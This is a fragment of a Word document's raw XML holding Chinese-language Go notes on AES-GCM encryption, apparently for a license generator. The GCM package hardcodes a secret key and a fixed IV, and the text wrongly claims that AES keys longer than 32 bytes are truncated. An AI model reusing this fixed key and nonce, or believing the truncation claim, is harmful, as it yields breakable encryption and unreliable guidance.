          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">err := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>rand</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B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Read</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(nonce)</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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">err != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">nil </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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">return nil, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>err</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t>}</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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>nonce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">func </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFC66D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>() {</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t>nonce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">err := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>generateNonce</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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">err != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">nil </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AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>log</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B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Fatal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(err)</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t>}</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AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>fmt</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B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Println</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6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Nonce:"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hex</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B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>EncodeToString</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(nonce))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F70B53E" w14:textId="77777777" w:rsidR="00380023" w:rsidRPr="00380023" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="722B11EB" w14:textId="77777777" w:rsidR="001D7388" w:rsidRDefault="001D7388" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D1D42C6" w14:textId="7E8593E0" w:rsidR="00236217" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gcm</w:t>
      </w:r>
      <w:r w:rsidR="00F83D04">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加密和解密</w:t>
      </w:r>
      <w:r w:rsidR="002D3009">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：实战，参考</w:t>
      </w:r>
      <w:r w:rsidR="002D3009">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>licenseGenerator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46979858" w14:textId="77777777" w:rsidR="00236217" w:rsidRDefault="00236217" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B705D57" w14:textId="26345667" w:rsidR="00236217" w:rsidRPr="00F83D04" w:rsidRDefault="00380023" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> GCM</w:t>
      </w:r>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Galois/Counter Mode</w:t>
      </w:r>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）模式中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>AES</w:t>
      </w:r>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Advanced Encryption Standard</w:t>
      </w:r>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）密钥的长度</w:t>
      </w:r>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>通常应为</w:t>
      </w:r>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 16 </w:t>
      </w:r>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>字节（</w:t>
      </w:r>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">128 </w:t>
      </w:r>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>位）或</w:t>
      </w:r>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 32 </w:t>
      </w:r>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>字节（</w:t>
      </w:r>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">256 </w:t>
      </w:r>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>位），因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> AES </w:t>
      </w:r>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>支持这两种密钥长度。如果密钥超过</w:t>
      </w:r>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 32 </w:t>
      </w:r>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>字节，将会被截断或者使用其中的前</w:t>
      </w:r>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 32 </w:t>
      </w:r>
      <w:r w:rsidRPr="00380023">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>字节。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E63FE5" w14:textId="09AABF12" w:rsidR="00236217" w:rsidRDefault="00236217" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76D0BCFF" w14:textId="77777777" w:rsidR="00236217" w:rsidRDefault="00236217" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D0AB792" w14:textId="08C34DF1" w:rsidR="002D3009" w:rsidRPr="00B2237A" w:rsidRDefault="00B2237A" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">package </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>gcmAesCipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">import </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6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"crypto/aes"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>"crypto/cipher"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>"encoding/hex"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>"log"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>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808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>// GCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>的分组密码模式不需要指定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> padding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>，因为本身支持不定长分组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">hex_cipher_key = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"fd2d9fb0bb4bc7a7e5d36e0cce8d26573950c4461c4d29afd46214e37e686197"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">hex_iv = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"29cd7489b0a30e28fb589377"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">func </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFC66D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>EncryptGCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(plainBytes []</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
